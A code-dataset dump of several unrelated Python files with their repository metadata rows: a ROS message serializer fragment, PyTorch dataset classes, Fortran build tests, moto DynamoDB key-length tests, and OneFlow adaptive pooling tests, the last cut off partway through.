(self.ok,) = _get_struct_B().unpack(str[start:end])
self.ok = bool(self.ok)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self.ok
buff.write(_get_struct_B().pack(_x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
start = end
end += 1
(self.ok,) = _get_struct_B().unpack(str[start:end])
self.ok = bool(self.ok)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_B = None
def _get_struct_B():
global _struct_B
if _struct_B is None:
_struct_B = struct.Struct("<B")
return _struct_B
class SwitchController(object):
_type = 'controller_manager_msgs/SwitchController'
_md5sum = 'b29a7abc673b2c54c14b54e50f8d06a5'
_request_class = SwitchControllerRequest
_response_class = SwitchControllerResponse
| 34.881081
| 145
| 0.653572
| 1,717
| 12,906
| 4.758299
| 0.136284
| 0.035251
| 0.026928
| 0.024969
| 0.762301
| 0.762301
| 0.755936
| 0.755936
| 0.741983
| 0.741983
| 0
| 0.018734
| 0.234852
| 12,906
| 369
| 146
| 34.97561
| 0.808608
| 0.193941
| 0
| 0.768657
| 1
| 0
| 0.183292
| 0.023112
| 0
| 0
| 0.002001
| 0
| 0
| 1
| 0.059701
| false
| 0
| 0.029851
| 0
| 0.205224
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7cb2d693eebfe6d57076eb01d8908d6c01307d06
| 989
|
py
|
Python
|
Fine-tune/datasets.py
|
neerajwagh/eeg-self-supervision
|
fb0a1bf357b0e553aab9c4ccfc2973156dc8a9e7
|
[
"MIT"
] | 7
|
2021-11-14T19:58:43.000Z
|
2022-03-19T08:35:14.000Z
|
evaluation/datasets.py
|
neerajwagh/eeg-self-supervision
|
fb0a1bf357b0e553aab9c4ccfc2973156dc8a9e7
|
[
"MIT"
] | null | null | null |
evaluation/datasets.py
|
neerajwagh/eeg-self-supervision
|
fb0a1bf357b0e553aab9c4ccfc2973156dc8a9e7
|
[
"MIT"
] | null | null | null |
import numpy as np
import torch
class Dataset(torch.utils.data.Dataset):
def __init__(self, window_idx, X, y):
self.window_idx = window_idx
self.topo_data = X
self.labels = y
def __len__(self):
return len(self.window_idx)
def __getitem__(self, sample_idx):
window_idx = self.window_idx[sample_idx]
return {
"window_idx": window_idx,
"feature_data": torch.from_numpy(self.topo_data[window_idx, ...]),
"label": self.labels[window_idx]
}
class TimeseriesDataset(torch.utils.data.Dataset):
def __init__(self, window_idx, X, y):
self.window_idx = window_idx
self.timeseries_data = X
self.labels = y
def __len__(self):
return len(self.window_idx)
def __getitem__(self, sample_idx):
window_idx = self.window_idx[sample_idx]
return {
"window_idx": window_idx,
"feature_data": torch.from_numpy(self.timeseries_data[window_idx, ...]),
"label": self.labels[window_idx]
}
| 26.026316
| 75
| 0.673407
| 136
| 989
| 4.485294
| 0.198529
| 0.295082
| 0.170492
| 0.118033
| 0.855738
| 0.855738
| 0.855738
| 0.855738
| 0.734426
| 0.734426
| 0
| 0
| 0.209302
| 989
| 37
| 76
| 26.72973
| 0.780051
| 0
| 0
| 0.666667
| 0
| 0
| 0.054601
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.066667
| 0.066667
| 0.466667
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7cc0b1ec3c4b4be7b725297afb96da72642e0929
| 116
|
py
|
Python
|
src/rxn_network/costs/__init__.py
|
GENESIS-EFRC/reaction-network
|
1482ac1b6b550a5bc9961e9210e33c86c07f64cf
|
[
"BSD-3-Clause-LBNL"
] | 29
|
2020-08-04T07:07:04.000Z
|
2022-02-22T22:09:20.000Z
|
src/rxn_network/costs/__init__.py
|
GENESIS-EFRC/reaction-network
|
1482ac1b6b550a5bc9961e9210e33c86c07f64cf
|
[
"BSD-3-Clause-LBNL"
] | 70
|
2021-02-22T07:01:40.000Z
|
2022-03-31T20:11:56.000Z
|
src/rxn_network/costs/__init__.py
|
GENESIS-EFRC/reaction-network
|
1482ac1b6b550a5bc9961e9210e33c86c07f64cf
|
[
"BSD-3-Clause-LBNL"
] | 3
|
2021-04-20T09:29:39.000Z
|
2022-02-02T17:43:52.000Z
|
from rxn_network.costs.calculators import ChempotDistanceCalculator
from rxn_network.costs.softplus import Softplus
| 38.666667
| 67
| 0.896552
| 14
| 116
| 7.285714
| 0.571429
| 0.137255
| 0.27451
| 0.372549
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068966
| 116
| 2
| 68
| 58
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7cff722f72bdcd49a46a4df7b9154b6fa4d6b435
| 753
|
py
|
Python
|
test/integration/languages/test_fortran.py
|
thomasrockhu/bfg9000
|
1cd1226eab9bed2fc2ec6acccf7864fdcf2ed31a
|
[
"BSD-3-Clause"
] | 72
|
2015-06-23T02:35:13.000Z
|
2021-12-08T01:47:40.000Z
|
test/integration/languages/test_fortran.py
|
thomasrockhu/bfg9000
|
1cd1226eab9bed2fc2ec6acccf7864fdcf2ed31a
|
[
"BSD-3-Clause"
] | 139
|
2015-03-01T18:48:17.000Z
|
2021-06-18T15:45:14.000Z
|
test/integration/languages/test_fortran.py
|
thomasrockhu/bfg9000
|
1cd1226eab9bed2fc2ec6acccf7864fdcf2ed31a
|
[
"BSD-3-Clause"
] | 19
|
2015-12-23T21:24:33.000Z
|
2022-01-06T04:04:41.000Z
|
import os.path
from .. import *
@skip_if('fortran' not in test_features, 'skipping fortran tests')
class TestF77(IntegrationTest):
def __init__(self, *args, **kwargs):
super().__init__(os.path.join('languages', 'f77'), *args, **kwargs)
def test_build(self):
self.build(executable('program'))
self.assertOutput([executable('program')], ' hello from f77!\n')
@skip_if('fortran' not in test_features, 'skipping fortran tests')
class TestF95(IntegrationTest):
def __init__(self, *args, **kwargs):
super().__init__(os.path.join('languages', 'f95'), *args, **kwargs)
def test_build(self):
self.build(executable('program'))
self.assertOutput([executable('program')], ' hello from f95!\n')
| 31.375
| 75
| 0.661355
| 91
| 753
| 5.230769
| 0.362637
| 0.084034
| 0.054622
| 0.067227
| 0.894958
| 0.894958
| 0.894958
| 0.894958
| 0.894958
| 0.894958
| 0
| 0.019169
| 0.168659
| 753
| 23
| 76
| 32.73913
| 0.741214
| 0
| 0
| 0.5
| 0
| 0
| 0.193891
| 0
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.25
| false
| 0
| 0.125
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b04c7c05e124f8d5b8593f1551b3aef44c7dc39
| 11,130
|
py
|
Python
|
tests/test_dynamodb/exceptions/test_key_length_exceptions.py
|
symroe/moto
|
4e106995af6f2820273528fca8a4e9ee288690a5
|
[
"Apache-2.0"
] | null | null | null |
tests/test_dynamodb/exceptions/test_key_length_exceptions.py
|
symroe/moto
|
4e106995af6f2820273528fca8a4e9ee288690a5
|
[
"Apache-2.0"
] | 1
|
2022-03-07T07:39:03.000Z
|
2022-03-07T07:39:03.000Z
|
tests/test_dynamodb/exceptions/test_key_length_exceptions.py
|
symroe/moto
|
4e106995af6f2820273528fca8a4e9ee288690a5
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import print_function
import boto3
import sure # noqa # pylint: disable=unused-import
import pytest
from moto import mock_dynamodb
from botocore.exceptions import ClientError
from moto.dynamodb.limits import HASH_KEY_MAX_LENGTH, RANGE_KEY_MAX_LENGTH
@mock_dynamodb
def test_item_add_long_string_hash_key_exception():
name = "TestTable"
conn = boto3.client("dynamodb", region_name="us-west-2")
conn.create_table(
TableName=name,
KeySchema=[{"AttributeName": "forum_name", "KeyType": "HASH"}],
AttributeDefinitions=[{"AttributeName": "forum_name", "AttributeType": "S"}],
ProvisionedThroughput={"ReadCapacityUnits": 5, "WriteCapacityUnits": 5},
)
conn.put_item(
TableName=name,
Item={
"forum_name": {"S": "x" * HASH_KEY_MAX_LENGTH},
"subject": {"S": "Check this out!"},
"Body": {"S": "http://url_to_lolcat.gif"},
"SentBy": {"S": "test"},
"ReceivedTime": {"S": "12/9/2011 11:36:03 PM"},
},
)
with pytest.raises(ClientError) as ex:
conn.put_item(
TableName=name,
Item={
"forum_name": {"S": "x" * (HASH_KEY_MAX_LENGTH + 1)},
"subject": {"S": "Check this out!"},
"Body": {"S": "http://url_to_lolcat.gif"},
"SentBy": {"S": "test"},
"ReceivedTime": {"S": "12/9/2011 11:36:03 PM"},
},
)
ex.value.response["Error"]["Code"].should.equal("ValidationException")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
# deliberately no space between "of" and "2048"
ex.value.response["Error"]["Message"].should.equal(
"One or more parameter values were invalid: Size of hashkey has exceeded the maximum size limit of2048 bytes"
)
@mock_dynamodb
def test_item_add_long_string_nonascii_hash_key_exception():
name = "TestTable"
conn = boto3.client("dynamodb", region_name="us-west-2")
conn.create_table(
TableName=name,
KeySchema=[{"AttributeName": "forum_name", "KeyType": "HASH"}],
AttributeDefinitions=[{"AttributeName": "forum_name", "AttributeType": "S"}],
ProvisionedThroughput={"ReadCapacityUnits": 5, "WriteCapacityUnits": 5},
)
emoji_b = b"\xf0\x9f\x98\x83" # smile emoji
emoji = emoji_b.decode("utf-8") # 1 character, but 4 bytes
short_enough = emoji * int(HASH_KEY_MAX_LENGTH / len(emoji.encode("utf-8")))
too_long = "x" + short_enough
conn.put_item(
TableName=name,
Item={
"forum_name": {"S": short_enough},
"subject": {"S": "Check this out!"},
"Body": {"S": "http://url_to_lolcat.gif"},
"SentBy": {"S": "test"},
"ReceivedTime": {"S": "12/9/2011 11:36:03 PM"},
},
)
with pytest.raises(ClientError) as ex:
conn.put_item(
TableName=name,
Item={
"forum_name": {"S": too_long},
"subject": {"S": "Check this out!"},
"Body": {"S": "http://url_to_lolcat.gif"},
"SentBy": {"S": "test"},
"ReceivedTime": {"S": "12/9/2011 11:36:03 PM"},
},
)
ex.value.response["Error"]["Code"].should.equal("ValidationException")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
# deliberately no space between "of" and "2048"
ex.value.response["Error"]["Message"].should.equal(
"One or more parameter values were invalid: Size of hashkey has exceeded the maximum size limit of2048 bytes"
)
@mock_dynamodb
def test_item_add_long_string_range_key_exception():
name = "TestTable"
conn = boto3.client("dynamodb", region_name="us-west-2")
conn.create_table(
TableName=name,
KeySchema=[
{"AttributeName": "forum_name", "KeyType": "HASH"},
{"AttributeName": "ReceivedTime", "KeyType": "RANGE"},
],
AttributeDefinitions=[
{"AttributeName": "forum_name", "AttributeType": "S"},
{"AttributeName": "ReceivedTime", "AttributeType": "S"},
],
ProvisionedThroughput={"ReadCapacityUnits": 5, "WriteCapacityUnits": 5},
)
conn.put_item(
TableName=name,
Item={
"forum_name": {"S": "LOLCat Forum"},
"subject": {"S": "Check this out!"},
"Body": {"S": "http://url_to_lolcat.gif"},
"SentBy": {"S": "someone@somewhere.edu"},
"ReceivedTime": {"S": "x" * RANGE_KEY_MAX_LENGTH},
},
)
with pytest.raises(ClientError) as ex:
conn.put_item(
TableName=name,
Item={
"forum_name": {"S": "LOLCat Forum"},
"subject": {"S": "Check this out!"},
"Body": {"S": "http://url_to_lolcat.gif"},
"SentBy": {"S": "someone@somewhere.edu"},
"ReceivedTime": {"S": "x" * (RANGE_KEY_MAX_LENGTH + 1)},
},
)
ex.value.response["Error"]["Code"].should.equal("ValidationException")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
ex.value.response["Error"]["Message"].should.equal(
"One or more parameter values were invalid: Aggregated size of all range keys has exceeded the size limit of 1024 bytes"
)
@mock_dynamodb
def test_put_long_string_gsi_range_key_exception():
name = "TestTable"
conn = boto3.client("dynamodb", region_name="us-west-2")
conn.create_table(
TableName=name,
KeySchema=[
{"AttributeName": "partition_key", "KeyType": "HASH"},
{"AttributeName": "sort_key", "KeyType": "RANGE"},
],
AttributeDefinitions=[
{"AttributeName": "partition_key", "AttributeType": "S"},
{"AttributeName": "sort_key", "AttributeType": "S"},
],
ProvisionedThroughput={"ReadCapacityUnits": 5, "WriteCapacityUnits": 5},
)
conn.put_item(
TableName=name,
Item={
# partition_key is only used as the HASH key
# so we can set it to range key length
"partition_key": {"S": "x" * (RANGE_KEY_MAX_LENGTH + 1)},
"sort_key": {"S": "sk"},
},
)
conn.update_table(
TableName=name,
AttributeDefinitions=[
{"AttributeName": "partition_key", "AttributeType": "S"},
{"AttributeName": "sort_key", "AttributeType": "S"},
],
GlobalSecondaryIndexUpdates=[
{
"Create": {
"IndexName": "random-table-index",
"KeySchema": [
{"AttributeName": "sort_key", "KeyType": "HASH"},
{"AttributeName": "partition_key", "KeyType": "RANGE"},
],
"Projection": {"ProjectionType": "KEYS_ONLY"},
"ProvisionedThroughput": {
"ReadCapacityUnits": 20,
"WriteCapacityUnits": 20,
},
}
},
],
)
with pytest.raises(ClientError) as ex:
conn.put_item(
TableName=name,
Item={
# partition_key is used as a range key in the GSI
# so updating this should still fail
"partition_key": {"S": "y" * (RANGE_KEY_MAX_LENGTH + 1)},
"sort_key": {"S": "sk2"},
},
)
ex.value.response["Error"]["Code"].should.equal("ValidationException")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
ex.value.response["Error"]["Message"].should.equal(
"One or more parameter values were invalid: Aggregated size of all range keys has exceeded the size limit of 1024 bytes"
)
@mock_dynamodb
def test_update_item_with_long_string_hash_key_exception():
name = "TestTable"
conn = boto3.client("dynamodb", region_name="us-west-2")
conn.create_table(
TableName=name,
KeySchema=[{"AttributeName": "forum_name", "KeyType": "HASH"}],
AttributeDefinitions=[{"AttributeName": "forum_name", "AttributeType": "S"}],
ProvisionedThroughput={"ReadCapacityUnits": 5, "WriteCapacityUnits": 5},
)
conn.update_item(
TableName=name,
Key={
"forum_name": {"S": "x" * HASH_KEY_MAX_LENGTH},
"ReceivedTime": {"S": "12/9/2011 11:36:03 PM"},
},
UpdateExpression="set body=:New",
ExpressionAttributeValues={":New": {"S": "hello"}},
)
with pytest.raises(ClientError) as ex:
conn.update_item(
TableName=name,
Key={
"forum_name": {"S": "x" * (HASH_KEY_MAX_LENGTH + 1)},
"ReceivedTime": {"S": "12/9/2011 11:36:03 PM"},
},
UpdateExpression="set body=:New",
ExpressionAttributeValues={":New": {"S": "hello"}},
)
ex.value.response["Error"]["Code"].should.equal("ValidationException")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
# deliberately no space between "of" and "2048"
ex.value.response["Error"]["Message"].should.equal(
"One or more parameter values were invalid: Size of hashkey has exceeded the maximum size limit of2048 bytes"
)
@mock_dynamodb
def test_update_item_with_long_string_range_key_exception():
name = "TestTable"
conn = boto3.client("dynamodb", region_name="us-west-2")
conn.create_table(
TableName=name,
KeySchema=[
{"AttributeName": "forum_name", "KeyType": "HASH"},
{"AttributeName": "ReceivedTime", "KeyType": "RANGE"},
],
AttributeDefinitions=[
{"AttributeName": "forum_name", "AttributeType": "S"},
{"AttributeName": "ReceivedTime", "AttributeType": "S"},
],
ProvisionedThroughput={"ReadCapacityUnits": 5, "WriteCapacityUnits": 5},
)
conn.update_item(
TableName=name,
Key={
"forum_name": {"S": "Lolcat Forum"},
"ReceivedTime": {"S": "x" * RANGE_KEY_MAX_LENGTH},
},
UpdateExpression="set body=:New",
ExpressionAttributeValues={":New": {"S": "hello"}},
)
with pytest.raises(ClientError) as ex:
conn.update_item(
TableName=name,
Key={
"forum_name": {"S": "Lolcat Forum"},
"ReceivedTime": {"S": "x" * (RANGE_KEY_MAX_LENGTH + 1)},
},
UpdateExpression="set body=:New",
ExpressionAttributeValues={":New": {"S": "hello"}},
)
ex.value.response["Error"]["Code"].should.equal("ValidationException")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
# deliberately no space between "of" and "2048"
ex.value.response["Error"]["Message"].should.equal(
"One or more parameter values were invalid: Aggregated size of all range keys has exceeded the size limit of 1024 bytes"
)
| 37.22408
| 128
| 0.568733
| 1,138
| 11,130
| 5.408612
| 0.150264
| 0.029245
| 0.043867
| 0.038993
| 0.863363
| 0.863363
| 0.863363
| 0.863038
| 0.850041
| 0.838993
| 0
| 0.022583
| 0.275921
| 11,130
| 298
| 129
| 37.348993
| 0.741159
| 0.037646
| 0
| 0.70155
| 0
| 0.011628
| 0.317349
| 0.005889
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0
| 0.027132
| 0
| 0.050388
| 0.003876
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b05177e8aa303cd994a9686466942c207d6c264
| 33,665
|
py
|
Python
|
oneflow/python/test/modules/test_adaptive_pool.py
|
xcnick/oneflow
|
7b786b27069dec35d2493256011e773988c91f56
|
[
"Apache-2.0"
] | null | null | null |
oneflow/python/test/modules/test_adaptive_pool.py
|
xcnick/oneflow
|
7b786b27069dec35d2493256011e773988c91f56
|
[
"Apache-2.0"
] | null | null | null |
oneflow/python/test/modules/test_adaptive_pool.py
|
xcnick/oneflow
|
7b786b27069dec35d2493256011e773988c91f56
|
[
"Apache-2.0"
] | null | null | null |
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
from collections import OrderedDict
import numpy as np
import oneflow.experimental as flow
from test_util import GenArgList
# TODO: auto test
def _test_adaptive_avgpool1d_forward(test_case, device):
input = flow.Tensor(
np.array(
[
[
[
0.05580734834074974,
-0.6875145435333252,
-1.654430866241455,
-0.6225992441177368,
0.10183599591255188,
0.05019790679216385,
-1.2537643909454346,
0.14907236397266388,
]
]
]
),
dtype=flow.float32,
device=flow.device(device),
)
m = flow.nn.AdaptiveAvgPool1d(4)
m.to(device)
of_out_1 = m(input)
of_out_2 = flow.adaptive_avg_pool1d(input, 4)
np_out = np.array(
[
[
[
-0.31585359573364258,
-1.13851499557495117,
0.07601694762706757,
-0.55234599113464355,
]
]
]
)
test_case.assertTrue(np.allclose(of_out_1.numpy(), np_out, 1e-5, 1e-5))
test_case.assertTrue(np.allclose(of_out_2.numpy(), np_out, 1e-5, 1e-5))
def _test_adaptive_avgpool1d_backward(test_case, device):
input = flow.Tensor(
np.array(
[
[
[
0.05580734834074974,
-0.6875145435333252,
-1.654430866241455,
-0.6225992441177368,
0.10183599591255188,
0.05019790679216385,
-1.2537643909454346,
0.14907236397266388,
]
]
]
),
dtype=flow.float32,
device=flow.device(device),
requires_grad=True,
)
m = flow.nn.AdaptiveAvgPool1d(4)
of_out = m(input)
of_out = of_out.sum()
of_out.backward()
np_grad = np.array([[[0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5]]])
test_case.assertTrue(np.allclose(input.grad.numpy(), np_grad, 1e-5, 1e-5))
@unittest.skipIf(
not flow.unittest.env.eager_execution_enabled(),
".numpy() doesn't work in lazy mode",
)
def _test_adaptive_avgpool2d_forward(test_case, device):
input = flow.Tensor(
np.array(
[
[
[
[
0.10039155930280685,
0.04879157617688179,
-1.0515470504760742,
0.9466001987457275,
],
[
0.45375481247901917,
0.23611211776733398,
1.343685269355774,
0.3979687988758087,
],
[
0.05580734834074974,
-0.6875145435333252,
-1.654430866241455,
-0.6225992441177368,
],
[
0.10183599591255188,
0.05019790679216385,
-1.2537643909454346,
0.14907236397266388,
],
]
]
]
),
dtype=flow.float32,
device=flow.device(device),
)
m = flow.nn.AdaptiveAvgPool2d((2, 2))
m.to(device)
of_out_1 = m(input)
of_out_2 = flow.adaptive_avg_pool2d(input, (2, 2))
np_out = np.array(
[
[
[
[0.20976251363754272, 0.4091767966747284],
[-0.1199183315038681, -0.8454304933547974],
]
]
]
)
test_case.assertTrue(np.allclose(of_out_1.numpy(), np_out, 1e-5, 1e-5))
test_case.assertTrue(np.allclose(of_out_2.numpy(), np_out, 1e-5, 1e-5))
def _test_adaptive_avgpool2d_backward(test_case, device):
input = flow.Tensor(
np.array(
[
[
[
[
0.10039155930280685,
0.04879157617688179,
-1.0515470504760742,
0.9466001987457275,
],
[
0.45375481247901917,
0.23611211776733398,
1.343685269355774,
0.3979687988758087,
],
[
0.05580734834074974,
-0.6875145435333252,
-1.654430866241455,
-0.6225992441177368,
],
[
0.10183599591255188,
0.05019790679216385,
-1.2537643909454346,
0.14907236397266388,
],
]
]
]
),
dtype=flow.float32,
device=flow.device(device),
requires_grad=True,
)
m = flow.nn.AdaptiveAvgPool2d((2, 2))
of_out = m(input)
of_out = of_out.sum()
of_out.backward()
np_grad = np.array(
[
[
[
[0.25, 0.25, 0.25, 0.25],
[0.25, 0.25, 0.25, 0.25],
[0.25, 0.25, 0.25, 0.25],
[0.25, 0.25, 0.25, 0.25],
]
]
]
)
test_case.assertTrue(np.allclose(input.grad.numpy(), np_grad, 1e-5, 1e-5))
def _test_adaptive_avgpool2d_hw_forward(test_case, device):
input = flow.Tensor(
np.array(
[
[
[
[0.28242185711860657, -0.7742040753364563, -0.5439430475234985],
[-0.1706847995519638, 0.0430854931473732, 0.34247592091560364],
[-1.036131501197815, -1.033642292022705, 0.3455536365509033],
]
]
]
),
dtype=flow.float32,
device=flow.device(device),
)
m = flow.nn.AdaptiveAvgPool2d((1, 2))
m.to(device)
of_out = m(input)
np_out = np.array([[[[-0.4481925666332245, -0.27011242508888245]]]])
test_case.assertTrue(np.allclose(of_out.numpy(), np_out, 1e-5, 1e-5))
def _test_adaptive_avgpool2d_hw_backward(test_case, device):
input = flow.Tensor(
np.array(
[
[
[
[0.28242185711860657, -0.7742040753364563, -0.5439430475234985],
[-0.1706847995519638, 0.0430854931473732, 0.34247592091560364],
[-1.036131501197815, -1.033642292022705, 0.3455536365509033],
]
]
]
),
dtype=flow.float32,
device=flow.device(device),
requires_grad=True,
)
m = flow.nn.AdaptiveAvgPool2d((1, 2))
of_out = m(input)
of_out = of_out.sum()
of_out.backward()
np_grad = np.array(
[
[
[
[0.1666666716337204, 0.3333333432674408, 0.1666666716337204],
[0.1666666716337204, 0.3333333432674408, 0.1666666716337204],
[0.1666666716337204, 0.3333333432674408, 0.1666666716337204],
]
]
]
)
test_case.assertTrue(np.allclose(input.grad.numpy(), np_grad, 1e-5, 1e-5))
def _test_adaptive_avgpool3d_forward(test_case, device):
input = flow.Tensor(
np.array(
[
[
[
[
[
-1.07757179960088489,
-0.78045388903658375,
-1.26275387521194427,
0.99935071451204771,
],
[
2.02225324891575164,
1.10345137769946500,
-0.43773247548795780,
1.89049181058751703,
],
[
-0.55938618990646538,
-0.49495202415265188,
-0.18536721363519787,
-0.60989698667757719,
],
[
-1.65362152601718160,
-1.03925835404367861,
0.36867765976139671,
-0.53568828349518050,
],
],
[
[
-1.26179006644499525,
-1.43909210916315322,
0.20654399652431357,
0.81864721019067133,
],
[
-0.30333788634000142,
-0.81732697640762930,
-0.37675150976256139,
-0.11021655039337777,
],
[
-0.22977043608192885,
1.27171963666499055,
-0.47908512978782908,
-1.44953694047278558,
],
[
-1.28020932869777826,
-0.11184514806663474,
1.70221670872109843,
-1.73548372877253554,
],
],
[
[
2.47064979917736061,
-0.65497026319732976,
-0.93181070795716758,
1.46529042716824276,
],
[
1.14198642343413970,
1.38990908108600797,
0.96578419005255678,
-0.85631142649766190,
],
[
0.19515087084250754,
-0.37808457398571094,
0.29386253984961830,
0.92799305103533269,
],
[
-0.93741182779940069,
0.33418317304524309,
-0.27925427653038332,
0.38029090707066726,
],
],
[
[
0.59186866597360410,
-0.78706310899389020,
-0.95343448742453918,
0.31341612954718795,
],
[
0.75090294441452277,
-0.92992883985623231,
-0.73430540527824761,
-0.88064815906966942,
],
[
-0.47078530163539850,
0.12253641652645629,
0.50880220398328457,
0.52039178932756203,
],
[
-0.08613006511636320,
0.30291348404866386,
-0.62685658736801231,
-0.27469204305759976,
],
],
]
]
]
),
dtype=flow.float32,
device=flow.device(device),
)
m = flow.nn.AdaptiveAvgPool3d((2, 2, 2))
m.to(device)
of_out_1 = m(input)
of_out_2 = flow.adaptive_avg_pool3d(input, (2, 2, 2))
np_out = np.array(
[
[
[
[
[-0.31923351254725391, 0.21594741511983859],
[-0.51216542128766618, -0.36552048929482639],
],
[
[0.49666933775477279, -0.20150242993241230],
[-0.11470347800925032, 0.18131719803880864],
],
]
]
]
)
test_case.assertTrue(np.allclose(of_out_1.numpy(), np_out, 1e-5, 1e-5))
test_case.assertTrue(np.allclose(of_out_2.numpy(), np_out, 1e-5, 1e-5))
def _test_adaptive_avgpool3d_backward(test_case, device):
input = flow.Tensor(
np.array(
[
[
[
[
[
-1.07757179960088489,
-0.78045388903658375,
-1.26275387521194427,
0.99935071451204771,
],
[
2.02225324891575164,
1.10345137769946500,
-0.43773247548795780,
1.89049181058751703,
],
[
-0.55938618990646538,
-0.49495202415265188,
-0.18536721363519787,
-0.60989698667757719,
],
[
-1.65362152601718160,
-1.03925835404367861,
0.36867765976139671,
-0.53568828349518050,
],
],
[
[
-1.26179006644499525,
-1.43909210916315322,
0.20654399652431357,
0.81864721019067133,
],
[
-0.30333788634000142,
-0.81732697640762930,
-0.37675150976256139,
-0.11021655039337777,
],
[
-0.22977043608192885,
1.27171963666499055,
-0.47908512978782908,
-1.44953694047278558,
],
[
-1.28020932869777826,
-0.11184514806663474,
1.70221670872109843,
-1.73548372877253554,
],
],
[
[
2.47064979917736061,
-0.65497026319732976,
-0.93181070795716758,
1.46529042716824276,
],
[
1.14198642343413970,
1.38990908108600797,
0.96578419005255678,
-0.85631142649766190,
],
[
0.19515087084250754,
-0.37808457398571094,
0.29386253984961830,
0.92799305103533269,
],
[
-0.93741182779940069,
0.33418317304524309,
-0.27925427653038332,
0.38029090707066726,
],
],
[
[
0.59186866597360410,
-0.78706310899389020,
-0.95343448742453918,
0.31341612954718795,
],
[
0.75090294441452277,
-0.92992883985623231,
-0.73430540527824761,
-0.88064815906966942,
],
[
-0.47078530163539850,
0.12253641652645629,
0.50880220398328457,
0.52039178932756203,
],
[
-0.08613006511636320,
0.30291348404866386,
-0.62685658736801231,
-0.27469204305759976,
],
],
]
]
]
),
dtype=flow.float32,
device=flow.device(device),
requires_grad=True,
)
m = flow.nn.AdaptiveAvgPool3d((2, 2, 2))
of_out = m(input)
of_out = of_out.sum()
of_out.backward()
np_grad = np.array(
[
[
[
[
[0.125, 0.125, 0.125, 0.125],
[0.125, 0.125, 0.125, 0.125],
[0.125, 0.125, 0.125, 0.125],
[0.125, 0.125, 0.125, 0.125],
],
[
[0.125, 0.125, 0.125, 0.125],
[0.125, 0.125, 0.125, 0.125],
[0.125, 0.125, 0.125, 0.125],
[0.125, 0.125, 0.125, 0.125],
],
[
[0.125, 0.125, 0.125, 0.125],
[0.125, 0.125, 0.125, 0.125],
[0.125, 0.125, 0.125, 0.125],
[0.125, 0.125, 0.125, 0.125],
],
[
[0.125, 0.125, 0.125, 0.125],
[0.125, 0.125, 0.125, 0.125],
[0.125, 0.125, 0.125, 0.125],
[0.125, 0.125, 0.125, 0.125],
],
]
]
]
)
test_case.assertTrue(np.allclose(input.grad.numpy(), np_grad, 1e-5, 1e-5))
def _test_adaptive_avgpool3d_dhw_forward(test_case, device):
input = flow.Tensor(
np.array(
[
[
[
[
[
-1.07757179960088489,
-0.78045388903658375,
-1.26275387521194427,
0.99935071451204771,
],
[
2.02225324891575164,
1.10345137769946500,
-0.43773247548795780,
